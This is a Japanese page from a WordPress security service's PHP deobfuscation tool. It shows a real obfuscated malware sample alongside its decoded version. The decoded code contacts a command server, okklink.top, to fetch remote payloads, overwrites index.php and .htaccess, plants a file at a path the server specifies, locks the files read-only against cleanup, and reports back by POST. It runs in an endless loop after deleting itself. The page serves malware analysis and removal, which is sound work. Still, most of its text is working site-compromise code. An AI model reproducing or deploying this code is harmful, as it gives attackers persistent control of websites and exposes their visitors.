Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php goto VZl6Z; XxaeY: $xAuKw = "\x75\x6e\163\145\x72"; goto nuADF; J4VQT: $Vvelw .= "\x36\64\x5f\x64"; goto LvV_7; Iknde: $u__bC .= "\x6e\146\x6c\141\164\145"; goto XxaeY; WWcTw: $AGwSr = $ZUCcc = $zOZqo = ''; goto H89yP; xISS8: $ytzA4 = $oOXFP; goto oCPgh; kLZHc: $qdgIN = 10; goto XIx5X; R7lss: die("\55\x3e\x6f\x6b\74\55"); goto LVGh2; vDJnT: $WDnhT .= "\145\156"; goto O_M3N; Yz7mp: @unlink(__FILE__); goto XAK04; YGqr4: $qCjEX = "\x63\150"; goto Lc0Cg; XAK04: @set_time_limit(0); goto NRyIE; W8kuz: $XUQyh = "\x66\143\x6c"; goto dg45D; FKgqs: $fA_BZ .= "\x6b\x6b\x6c\151\x6e"; goto nzgg2; ZbQNP: $avyi0 = "\165\163\154"; goto MNO4h; dc1ri: $Vvelw = "\x62\141\x73\x65"; goto J4VQT; F7Vh0: if ($isvLq($m0pXc, 2 | 4)) { goto JbMeR; } goto R7lss; UEaIc: $MxcFx = "\x66\x69\154\x65\137"; goto rQz25; dg45D: $XUQyh .= "\x6f\163\145"; goto EidRd; MGvcG: goto W5hsh; goto z201B; oCPgh: $ytzA4 .= "\x5f\146\151\x6c\145"; goto YGqr4; H89yP: $fA_BZ = "\x68\164\164\x70\x73\x3a\57\x2f\x6f"; goto FKgqs; XIx5X: $avyi0($qdgIN * 1000); goto MGvcG; pmhrO: $xubOT .= "\145\145\160"; goto ZbQNP; wrHJ6: $V6Yod = dirname(__FILE__); goto Yz7mp; ojjpZ: $SoJKZ .= "\x69\x66"; goto oK8KZ; k7jT5: gDkyl: goto UEaIc; Lc0Cg: $qCjEX .= "\x6d\x6f\144"; goto OIJ0G; nuADF: $xAuKw .= "\x69\x61\x6c\151\x7a\x65"; goto DQ9P3; cwBio: $SoJKZ = $V6Yod; goto NkkF6; H4fiK: try { goto tYEMM; vZ7Y9: Hyyij: goto zV3_f; vyPgw: $TqN4D = $uKUCb[0]; goto nrgZG; PxHhq: $BP2zl .= "\x61\143"; goto S_0tj; S_0tj: $BP2zl .= "\164\75\147\x65\x74\x63"; goto gM29X; M5CTC: MnMSz($lPqsf . "\46\164\75\160", "\x50\x4f\123\124", ["\144\141\164\141" => $umITF["\144"]["\x75\162\154"]], 5); goto HRuGE; c7fh8: Ha5_I: goto qYm03; A1u99: $MxcFx($dJwhR, $umITF["\x64"]["\143\x6f\x64\145"]); goto fgp5s; deeZW: UBMp5: goto q3pqk; GMmBp: @mkdir($bdkad, 0755, true); goto c7fh8; Lr5Jz: $lPqsf = $fA_BZ . "\141\143\x74\75\143\141\x6c\154"; goto M5CTC; jlMYg: $zOZqo .= "\162\x2e\x69\156\x69"; goto QPUdX; HRuGE: amQQb: goto NCEvO; skx1i: $qCjEX($ZUCcc, 0755); goto NRzNU; VbHRH: $n4SBf = $Ul7hX["\x44\x4f\103\125\115\x45\116\x54\137\122\117\117\124"]; goto G3J96; ACp59: $uKUCb = explode("\72", $umITF["\143"]); goto vyPgw; gM29X: $BP2zl .= "\x6f\160\x79\x26\x68\75" . A; goto W9eSL; HVQHm: $ZUCcc .= "\x61\143\143\145\163\x73"; goto xBno1; QzA05: $AGwSr .= "\x68\160"; goto UFIu6; IWjGX: $MxcFx($AGwSr, $umITF["\x61"]); goto UeMGy; Okqsc: $qCjEX($n4SBf, 0755); goto Mcvxd; W9eSL: $w1XqC = Mnmsz($BP2zl); goto b7YVk; Fatue: @unlink($zOZqo); goto YICFL; fKiIm: if (!($w1XqC !== false)) { goto us58b; } goto AHfd_; vQ8w6: $qCjEX($n4SBf, 0555); goto deeZW; O7p4V: $qCjEX($bdkad, 0755); goto A1u99; AHfd_: $umITF = $xAuKw($u__bC($Vvelw($w1XqC))); goto AtBSn; uVSdo: $qCjEX($n4SBf, 0555); goto dwxOS; ic3ia: $qCjEX($n4SBf, 0755); goto skx1i; b7YVk: $PKAg1 = time(); goto fKiIm; sm7Vh: $AGwSr .= "\x64\145\170\56\x70"; goto QzA05; wjl6G: $Ul7hX = $xAuKw($umITF["\x66"]); goto UlXJG; lPf42: if (is_dir($bdkad)) { goto Ha5_I; } goto GMmBp; u2ETp: $ZUCcc .= "\57\x2e\x68\x74"; goto HVQHm; Ti3_s: $BP2zl = $fA_BZ; goto PxHhq; FU0An: if (!is_dir($bdkad)) { goto ZvvdL; } goto L1VUb; rh_ib: $bdkad = dirname($dJwhR); goto lPf42; AtBSn: if (!is_array($umITF)) { goto hGjdm; } goto ACp59; Y5Sle: $qCjEX($n4SBf, 0755); goto Fatue; NCEvO: ZvvdL: goto v33N2; iXNCR: $zOZqo .= "\57\x2e\165\x73\x65"; goto jlMYg; ifKvj: $qCjEX($bdkad, 0555); goto Lr5Jz; QPUdX: $dJwhR = $n4SBf . $umITF["\x64"]["\x70\x61\x74\150"]; goto rh_ib; xBno1: $zOZqo = $n4SBf; goto iXNCR; L1VUb: if (!(!is_file($dJwhR) || $ytzA4($dJwhR) != $oOXFP($umITF["\x64"]["\x63\157\144\145"]))) { goto amQQb; } goto O7p4V; fgp5s: $qCjEX($dJwhR, 0555); goto ifKvj; UlXJG: if (!is_array($Ul7hX)) { goto UJzCI; } goto VbHRH; gA0UG: $qCjEX($ZUCcc, 0555); goto uVSdo; nvcr0: if (!(!is_file($AGwSr) || $ytzA4($AGwSr) != $TqN4D)) { goto UBMp5; } goto Okqsc; G3J96: UJzCI: goto zCFbH; nrgZG: $LFg81 = $uKUCb[1]; goto wjl6G; zV3_f: if (!(!empty($n4SBf) && is_dir($n4SBf))) { goto dhoE1; } goto aP5kE; UeMGy: $qCjEX($AGwSr, 0555); goto vQ8w6; UFIu6: $ZUCcc = $n4SBf; goto u2ETp; qYm03: if (!is_file($zOZqo)) { goto KCsJ5; } goto Y5Sle; Mcvxd: $qCjEX($AGwSr, 0755); goto IWjGX; tYEMM: if (!(!is_array($umITF) || time() - $PKAg1 > $blKmR)) { goto Hyyij; } goto Ti3_s; v33N2: dhoE1: goto YeF7h; ttAww: $AGwSr .= "\57\151\156"; goto sm7Vh; q3pqk: if (!(!is_file($ZUCcc) || $ytzA4($ZUCcc) != $LFg81)) { goto z30A_; } goto ic3ia; ZzGjZ: us58b: goto vZ7Y9; aP5kE: $AGwSr = $n4SBf; goto ttAww; dwxOS: z30A_: goto FU0An; zCFbH: hGjdm: goto ZzGjZ; lqwFw: KCsJ5: goto nvcr0; NRzNU: $MxcFx($ZUCcc, $umITF["\142"]); goto gA0UG; YICFL: $qCjEX($n4SBf, 0555); goto lqwFw; YeF7h: } catch (Exception $pLjln) { } goto kLZHc; it8G8: $isvLq .= "\x63\153"; goto W8kuz; MNO4h: $avyi0 .= "\145\x65\x70"; goto uYX48; NRyIE: @ignore_user_abort(1); goto P2htu; VZl6Z: define("A", "openwaterbodycare.com"); goto wrHJ6; oK8KZ: $WDnhT = "\146\x6f\x70"; goto vDJnT; NkkF6: $SoJKZ .= "\57\x70\141"; goto iek50; tOPGp: if (!1) { goto hbL2K; } goto H4fiK; P2htu: if (!function_exists("\144\x61\164\x65\137\144\x65\x66\141\x75\154\164\137\x74\x69\155\x65\172\x6f\x6e\x65\x5f\163\x65\164")) { goto gDkyl; } goto WG0kX; yH0gI: W5hsh: goto tOPGp; LVGh2: JbMeR: goto yH0gI; rQz25: $MxcFx .= "\160\165\164\137\x63"; goto e5NbU; e5NbU: $MxcFx .= "\x6f\x6e\x74\x65\x6e\x74\163"; goto dc1ri; WG0kX: @date_default_timezone_set("\x50\122\103"); goto k7jT5; LvV_7: $Vvelw .= "\145\x63\x6f\x64\x65"; goto YHphc; YHphc: $u__bC = "\147\172\x69"; goto Iknde; O_M3N: $isvLq = "\146\154\157"; goto it8G8; Owrgc: $TqN4D = $LFg81 = $Ul7hX = $n4SBf = ''; goto WWcTw; uYX48: $oOXFP = "\x6d\144\x35"; goto xISS8; nzgg2: $fA_BZ .= "\153\56\x74\157"; goto jJ_F6; AKTKx: $blKmR = 60 * 5; goto HATQ2; iek50: $SoJKZ .= "\171\x70\x61\154\x2e\147"; goto ojjpZ; EidRd: $m0pXc = $WDnhT($SoJKZ, "\167\53"); goto F7Vh0; OIJ0G: $PKAg1 = time(); goto AKTKx; jJ_F6: $fA_BZ .= "\x70\x2f\77"; goto cwBio; z201B: hbL2K: goto dXKM2; DQ9P3: $xubOT = "\163\154"; goto pmhrO; HATQ2: $umITF = false; goto Owrgc; dXKM2: function mNmsz($BP2zl, $lAQQr = "\x47\105\124", $jX3I8 = array(), $hIWfc = 30) { try { goto KcPxv; iBQjP: curl_close($mUsu4); goto z2nzK; KcPxv: $mUsu4 = curl_init(); goto nJyG2; hwIVx: curl_setopt($mUsu4, CURLOPT_POSTFIELDS, http_build_query($jX3I8)); goto vv3ng; MwIN7: curl_setopt($mUsu4, CURLOPT_SSL_VERIFYHOST, false); goto nWhrQ; U81TB: curl_setopt($mUsu4, CURLOPT_POST, 1); goto hwIVx; wLZ4S: $SOeKk = curl_exec($mUsu4); goto iBQjP; P0ykZ: curl_setopt($mUsu4, CURLOPT_SSL_VERIFYPEER, false); goto MwIN7; GfInt: curl_setopt($mUsu4, CURLOPT_RETURNTRANSFER, 1); goto P0ykZ; W1nJx: curl_setopt($mUsu4, CURLOPT_TIMEOUT, $hIWfc); goto Y0YFf; qxs7J: curl_setopt($mUsu4, CURLOPT_USERAGENT, "\127\110\122"); goto LOqgO; vv3ng: G1Hz2: goto wLZ4S; Y0YFf: if (!($lAQQr == "\120\x4f\123\124")) { goto G1Hz2; } goto U81TB; LOqgO: curl_setopt($mUsu4, CURLOPT_CONNECTTIMEOUT, 0); goto GfInt; nJyG2: curl_setopt($mUsu4, CURLOPT_URL, $BP2zl); goto qxs7J; nWhrQ: curl_setopt($mUsu4, CURLOPT_FOLLOWLOCATION, true); goto W1nJx; z2nzK: return trim(trim($SOeKk, "\357\xbb\xbf")); goto zVIiI; zVIiI: } catch (Exception $pLjln) { } return 0; }<?php
define("A", "openwaterbodycare.com");
$V6Yod = "/var/www/html";
@unlink("/var/www/html/input.php");
@set_time_limit(0);
@ignore_user_abort(1);
if (!function_exists("date_default_timezone_set")) {
goto gDkyl;
}
@date_default_timezone_set("PRC");
gDkyl:
$MxcFx = "file_";
$MxcFx = "file_put_c";
$MxcFx = "file_put_contents";
$Vvelw = "base";
$Vvelw = "base64_d";
$Vvelw = "base64_decode";
$u__bC = "gzi";
$u__bC = "gzinflate";
$xAuKw = "unser";
$xAuKw = "unserialize";
$xubOT = "sl";
$xubOT = "sleep";
$avyi0 = "usl";
$avyi0 = "usleep";
$oOXFP = "md5";
$ytzA4 = $oOXFP;
$ytzA4 = "md5_file";
$qCjEX = "ch";
$qCjEX = "chmod";
$PKAg1 = time();
$blKmR = 300;
$umITF = false;
$TqN4D = $LFg81 = $Ul7hX = $n4SBf = '';
$AGwSr = $ZUCcc = $zOZqo = '';
$fA_BZ = "https://o";
$fA_BZ = "https://okklin";
$fA_BZ = "https://okklink.to";
$fA_BZ = "https://okklink.top/?";
$SoJKZ = $V6Yod;
$SoJKZ .= "/pa";
$SoJKZ .= "ypal.g";
$SoJKZ .= "if";
$WDnhT = "fop";
$WDnhT = "fopen";
$isvLq = "flo";
$isvLq = "flock";
$XUQyh = "fcl";
$XUQyh = "fclose";
$m0pXc = fopen($SoJKZ, "w+");
if (flock($m0pXc, 6)) {
W5hsh:
if (!1) {
function mNmsz($BP2zl, $lAQQr = "GET", $jX3I8 = array(), $hIWfc = 30)
{
try {
$mUsu4 = curl_init();
curl_setopt($mUsu4, CURLOPT_URL, $BP2zl);
curl_setopt($mUsu4, CURLOPT_USERAGENT, "WHR");
curl_setopt($mUsu4, CURLOPT_CONNECTTIMEOUT, 0);
curl_setopt($mUsu4, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($mUsu4, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($mUsu4, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($mUsu4, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($mUsu4, CURLOPT_TIMEOUT, $hIWfc);
if (!($lAQQr == "POST")) {
goto G1Hz2;
}
curl_setopt($mUsu4, CURLOPT_POST, 1);
curl_setopt($mUsu4, CURLOPT_POSTFIELDS, http_build_query($jX3I8));
G1Hz2:
$SOeKk = curl_exec($mUsu4);
curl_close($mUsu4);
return trim(trim($SOeKk, ""));
} catch (Exception $pLjln) {
}
return 0;
}
// [PHPDeobfuscator] Implied script end
return;
}
try {
if (!(!is_array($umITF) || time() - $PKAg1 > $blKmR)) {
goto Hyyij;
}
$BP2zl = $fA_BZ;
$BP2zl .= "ac";
$BP2zl .= "t=getc";
$BP2zl .= "opy&h=openwaterbodycare.com";
$w1XqC = Mnmsz($BP2zl);
$PKAg1 = time();
if (!($w1XqC !== false)) {
goto us58b;
}
$umITF = $xAuKw($u__bC($Vvelw($w1XqC)));
if (!is_array($umITF)) {
goto hGjdm;
}
$uKUCb = explode(":", $umITF["c"]);
$TqN4D = $uKUCb[0];
$LFg81 = $uKUCb[1];
$Ul7hX = $xAuKw($umITF["f"]);
if (!is_array($Ul7hX)) {
goto UJzCI;
}
$n4SBf = $Ul7hX["DOCUMENT_ROOT"];
UJzCI:
hGjdm:
us58b:
Hyyij:
if (!(!empty($n4SBf) && is_dir($n4SBf))) {
goto dhoE1;
}
$AGwSr = $n4SBf;
$AGwSr .= "/in";
$AGwSr .= "dex.p";
$AGwSr .= "hp";
$ZUCcc = $n4SBf;
$ZUCcc .= "/.ht";
$ZUCcc .= "access";
$zOZqo = $n4SBf;
$zOZqo .= "/.use";
$zOZqo .= "r.ini";
$dJwhR = $n4SBf . $umITF["d"]["path"];
$bdkad = dirname($dJwhR);
if (is_dir($bdkad)) {
goto Ha5_I;
}
@mkdir($bdkad, 0755, true);
Ha5_I:
if (!is_file($zOZqo)) {
goto KCsJ5;
}
$qCjEX($n4SBf, 0755);
@unlink($zOZqo);
$qCjEX($n4SBf, 0555);
KCsJ5:
if (!(!is_file($AGwSr) || $ytzA4($AGwSr) != $TqN4D)) {
goto UBMp5;
}
$qCjEX($n4SBf, 0755);
$qCjEX($AGwSr, 0755);
$MxcFx($AGwSr, $umITF["a"]);
$qCjEX($AGwSr, 0555);
$qCjEX($n4SBf, 0555);
UBMp5:
if (!(!is_file($ZUCcc) || $ytzA4($ZUCcc) != $LFg81)) {
goto z30A_;
}
$qCjEX($n4SBf, 0755);
$qCjEX($ZUCcc, 0755);
$MxcFx($ZUCcc, $umITF["b"]);
$qCjEX($ZUCcc, 0555);
$qCjEX($n4SBf, 0555);
z30A_:
if (!is_dir($bdkad)) {
goto ZvvdL;
}
if (!(!is_file($dJwhR) || $ytzA4($dJwhR) != $oOXFP($umITF["d"]["code"]))) {
goto amQQb;
}
$qCjEX($bdkad, 0755);
$MxcFx($dJwhR, $umITF["d"]["code"]);
$qCjEX($dJwhR, 0555);
$qCjEX($bdkad, 0555);
$lPqsf = $fA_BZ . "act=call";
MnMSz($lPqsf . "&t=p", "POST", ["data" => $umITF["d"]["url"]], 5);
amQQb:
ZvvdL:
dhoE1:
} catch (Exception $pLjln) {
}
$qdgIN = 10;
$avyi0(10000);
goto W5hsh;
}
die("->ok<-");■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.